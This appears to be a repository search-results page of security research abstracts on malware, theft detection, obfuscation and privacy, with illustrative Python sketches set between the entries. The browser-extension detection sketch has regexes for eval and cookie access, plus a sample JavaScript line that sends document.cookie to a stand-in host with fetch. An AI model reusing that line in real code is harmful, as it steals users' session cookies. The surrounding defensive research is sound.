NSF PAR Search | NSF Public Access Repository

Image-based PDF Malware Detection Using Pre-trained Deep Neural Networks

https://doi.org/10.1109/ISDFS60797.2024.10527343

Nichols, Tyler; Zemlanicky, Jack; Luo, Zhirui; Li, Qingqing; Zheng, Jun (April 2024, 2024 12th International Symposium on Digital Forensics and Security (ISDFS))

PDF is a popular document file format with a flexible file structure that can embed diverse types of content, including images and JavaScript code. However, these features make it a favored vehicle for malware attackers. In this paper, we propose an image-based PDF malware detection method that utilizes pre-trained deep neural networks (DNNs). Specifically, we convert PDF files into fixed-size grayscale images using an image visualization technique. These images are then fed into pre-trained DNN models to classify them as benign or malicious. We investigated four classical pre-trained DNN models in our study. We evaluated the performance of the proposed method using the publicly available Contagio PDF malware dataset. Our results demonstrate that MobileNetv3 achieves the best detection performance with an accuracy of 0.9969 and exhibits low computational complexity, making it a promising solution for image-based PDF malware detection.
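The abstract does not say which image visualization technique is used, so the following is only a minimal sketch of one common approach (a byte plot), not the authors' method. It lays the raw file bytes out row by row and resamples them to a fixed square size. The function name `bytes_to_grayscale` and the `width` and `size` defaults are assumptions made for illustration.

```python
import math


def bytes_to_grayscale(data, width=64, size=32):
    """Map raw bytes to a size x size grayscale image (pixel values 0-255).

    Assumed byte-plot scheme: one byte per pixel, rows of `width` bytes,
    then a nearest-neighbour resize to a fixed square image.
    """
    if not data:
        return [[0] * size for _ in range(size)]
    # Lay the bytes out row by row, zero-padding the last row.
    height = math.ceil(len(data) / width)
    padded = data + bytes(height * width - len(data))
    rows = [padded[r * width:(r + 1) * width] for r in range(height)]
    # Nearest-neighbour resampling to the fixed output size.
    return [
        [rows[(i * height) // size][(j * width) // size] for j in range(size)]
        for i in range(size)
    ]


# Stand-in for the contents of a PDF file.
image = bytes_to_grayscale(b"%PDF-1.7\n" * 100)
```

The resulting fixed-size pixel grid is the kind of input that could then be passed to a pre-trained image classifier; that step is not shown here.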
Full Text Available
Enhancing the Performance of Semi-supervised Electricity Theft Detection in Smart Grids with Feature Engineering and Ensemble Learning

https://doi.org/10.1109/KPEC61529.2024.10676305

Qi, Ruobin; Japp, Wynter; Pan, Stephen; Zheng, Jun; Shao, Sihua (April 2024, IEEE)

Electricity theft is a type of cyberattack posing significant risks to the security of smart grids. Semi-supervised outlier detection (SSOD) algorithms utilize normal power usage data to build detection models, enabling them to detect unknown electricity theft attacks. In this paper, we applied feature engineering and ensemble learning to improve the detection performance of SSOD algorithms. Specifically, we extracted 22 time-series and wavelet features from load profiles, which served as inputs for the seven popular SSOD algorithms investigated in this study. Experimental results demonstrate that the proposed feature engineering greatly enhances the performance of SSOD algorithms to detect various false data injection (FDI) attacks. Furthermore, we constructed bagged ensemble models using the best-performing SSOD algorithm as the base model, with results indicating further improvements in detection performance compared to the base model alone.
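The idea of a bagged ensemble of semi-supervised detectors can be sketched as follows. This is an illustration under stated assumptions, not the paper's pipeline: the base model `ZScoreDetector` is a toy stand-in for the SSOD algorithms studied, the two input features are hypothetical rather than the 22 features the authors extracted, and all names are made up for this example. Each base model is fitted on a bootstrap resample of normal data only, and the anomaly scores are averaged.

```python
import random
import statistics


class ZScoreDetector:
    """Toy semi-supervised detector, fitted on normal samples only."""

    def fit(self, rows):
        cols = list(zip(*rows))
        self.means = [statistics.fmean(c) for c in cols]
        # Fall back to 1.0 if a bootstrap sample has zero spread.
        self.stds = [statistics.pstdev(c) or 1.0 for c in cols]
        return self

    def score(self, row):
        # Mean absolute z-score; larger means more anomalous.
        return statistics.fmean(
            abs(x - m) / s for x, m, s in zip(row, self.means, self.stds)
        )


def fit_bagged(rows, n_models=10, seed=0):
    """Fit each base detector on a bootstrap resample of the normal data."""
    rng = random.Random(seed)
    return [
        ZScoreDetector().fit(rng.choices(rows, k=len(rows)))
        for _ in range(n_models)
    ]


def bagged_score(models, row):
    """Average the anomaly scores of all base detectors."""
    return statistics.fmean(m.score(row) for m in models)


# Hypothetical normal load features: (daily mean, daily peak).
data_rng = random.Random(1)
normal = [[data_rng.gauss(10, 1), data_rng.gauss(5, 0.5)] for _ in range(200)]
models = fit_bagged(normal)
```

A sample whose features sit far from the normal training data, such as a sharply reduced reported load, should receive a higher averaged score than a typical sample.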
Full Text Available
Evaluation of Large Language Models on Code Obfuscation (Student Abstract)

https://doi.org/10.1609/aaai.v38i21.30517

Swindle, Adrian; McNealy, Derrick; Krishnan, Giri; Ramyaa, Ramyaa (March 2024, Proceedings of the AAAI Conference on Artificial Intelligence)

Obfuscation is intended to reduce the interpretability of code and hinder identification of its behavior. Large Language Models (LLMs) have been proposed for code synthesis and code analysis. This paper attempts to understand how well LLMs can analyze code and identify code behavior. Specifically, this paper systematically evaluates several LLMs’ capabilities to detect obfuscated code and identify behavior across a variety of obfuscation techniques with varying levels of complexity. LLMs proved to be better at detecting obfuscations that changed identifiers, even to misleading ones, than obfuscations involving code insertions (unused variables, as well as variables that replace constants with expressions that evaluate to those constants). Hardest to detect were obfuscations that layered multiple simple transformations. For these, only 20-40% of the LLMs’ responses were correct. Adding misleading documentation was also successful in misleading LLMs. We provide all our code to replicate results at https://github.com/SwindleA/LLMCodeObfuscation. Overall, our results suggest a gap in LLMs’ ability to understand code.
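The obfuscation categories named in the abstract can be illustrated with a small example. The functions below are hypothetical and are not taken from the authors' repository; they only show what identifier renaming, code insertion, and a layered combination might look like while leaving behavior unchanged.

```python
def area(width, height):
    """Original: area of a rectangle."""
    return width * height


# Identifier renaming, here to deliberately misleading names.
def send_email(password, username):
    return password * username


# Code insertion: an unused variable, plus a constant (1) replaced
# by an expression that evaluates to that constant.
def area_inserted(width, height):
    unused = width + 42      # never read again
    one = (7 * 3) - 20       # evaluates to 1
    return width * height * one


# Layered: misleading names, inserted code, and a misleading docstring.
def parse_date(token, buffer):
    """Parse a date string into a timestamp."""
    checksum = token - buffer    # never read again
    scale = (2 ** 3) // 8        # evaluates to 1
    return scale * token * buffer
```

All four functions return the same value for the same inputs, which is what makes the later variants obfuscations rather than different programs.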
Full Text Available
Exploring Spatial Transformation-Based Privacy in a Small Town

Jacobs, Aidan; Mazumdar, Subhasish (June 2023, MOBILITY 2023 : The Thirteenth International Conference on Mobile Services, Resources, and Users)

As mobile devices become increasingly prevalent in society, the expected utility of such devices rises; arguably, the most impact comes from location-based services as they provide tremendous benefits to mobile users. These users also value privacy, i.e., keeping their locations and search queries private, but that is not easy to achieve. It has been previously proposed that user location privacy can be secured through the use of space filling curves due to their ability to preserve spatial proximity while hiding the actual physical locations. With a space filling curve, such as the Hilbert curve, an application that provides location-based services can allow the user to take advantage of those services without transmitting a physical location. Earlier research has uncovered vulnerabilities of such systems and proposed remedies. But those countermeasures were clearly aimed at reasonably large metropolitan areas. It was not clear if they were appropriate for small towns, which display sparsity of Points of Interest (POIs) and limited diversity in their categories. This paper studies the issue focusing on a small university town.
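To make the space filling curve idea concrete, here is a minimal sketch of the standard mapping from a grid cell to its position along a Hilbert curve. It shows only the plain coordinate-to-index conversion; the privacy scheme, its parameters, and the countermeasures discussed in the paper are not modeled. The function name `hilbert_index` and the grid size are assumptions for this example.

```python
def hilbert_index(n, x, y):
    """Return the Hilbert curve index of cell (x, y) on an n x n grid.

    n must be a power of two, and 0 <= x, y < n.
    """
    d = 0
    s = n // 2
    while s > 0:
        rx = 1 if x & s else 0
        ry = 1 if y & s else 0
        d += s * s * ((3 * rx) ^ ry)
        # Rotate or flip the quadrant so the sub-curve is oriented correctly.
        if ry == 0:
            if rx == 1:
                x, y = n - 1 - x, n - 1 - y
            x, y = y, x
        s //= 2
    return d


# A client could report this index instead of its grid coordinates.
index = hilbert_index(8, 5, 2)
```

Cells that are consecutive along the curve are always adjacent on the grid, which is the proximity-preserving property the abstract refers to.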
Full Text Available
Detecting Malicious Browser Extensions by Combining Machine Learning and Feature Engineering

https://doi.org/10.1007/978-3-031-28332-1_13

Rydecki, J.; Tong, J.; Zheng, J. (May 2023, Advances in intelligent systems and computing)
Latifi, S. (Ed.)
As the popularity of the internet continues to grow, along with the use of web browsers and browser extensions, the threat of malicious browser extensions has increased. This demands an effective way to detect these malicious extensions and, in turn, prevent their installation. These extensions compromise private user information (including usernames and passwords) and can also compromise the user’s computer by delivering Trojans and other malicious software. This paper presents a method that combines machine learning and feature engineering to detect malicious browser extensions. By analyzing the static code of browser extensions and extracting features from it, the method predicts whether a browser extension is malicious or benign with a machine learning algorithm. Four machine learning algorithms (SVM, RF, KNN, and XGBoost) were tested on a dataset we collected for this study. Their detection performance is discussed in terms of several performance metrics.
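Static feature extraction of this kind might look like the sketch below. The abstract does not list the features the authors used, so the three patterns here are purely hypothetical examples, as are the names `PATTERNS` and `extract_features`. The sketch counts occurrences of each pattern in an extension's JavaScript source and returns the counts as a feature dictionary.

```python
import re

# Hypothetical static features; not the feature set used in the paper.
PATTERNS = {
    "eval_calls": re.compile(r"\beval\s*\("),
    "cookie_access": re.compile(r"document\.cookie"),
    "network_calls": re.compile(r"\bXMLHttpRequest\b|\bfetch\s*\("),
}


def extract_features(source):
    """Count occurrences of each pattern in the JavaScript source text."""
    return {name: len(p.findall(source)) for name, p in PATTERNS.items()}


sample = 'eval(atob(x)); fetch("https://example.com", {body: document.cookie});'
features = extract_features(sample)
```

A feature dictionary like this would be converted to a numeric vector and passed to a classifier such as the ones named in the abstract; that step is omitted here.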
Full Text Available
Securing Smart Grid Enabled Home Area Networks with Retro-Reflective Visible Light Communication

https://doi.org/10.3390/s23031245

Salas, Mathew; Shao, Sihua; Salustri, Adrian; Schroeck, Zachary; Zheng, Jun (February 2023, Sensors)

Smart appliance run schedules and electric vehicle charging can be managed over a smart-grid-enabled home area network (HAN) to reduce electricity demand at critical times and add more plug-in electric vehicles to the grid, which eventually lowers customers’ energy bills and reduces greenhouse gas emissions. Short-range radio-based wireless communication technologies commonly adopted in a HAN are vulnerable to cyber attacks due to their wide interception range. In this work, a low-cost solution is proposed for securing the low-volume data exchange of sensitive tasks (e.g., key management and mutual authentication). Our approach utilizes the emerging concept of retro-reflector based visible light communication (Retro-VLC), where smart appliances, IoT sensors and other electric devices perform the sensitive data exchange with the HAN gateway via the secure Retro-VLC channel. To conduct the feasibility study, a multi-pixel Retro-VLC link is prototyped to enable quadrature amplitude modulation. The bit error rate of Retro-VLC is studied analytically, numerically and experimentally. A heterogeneous Retro-VLC + WLAN connection is implemented by socket programming. In addition, the working range, sniffing range, and key exchange latency are measured. The results validate the applicability of the Retro-VLC based solution.
Full Text Available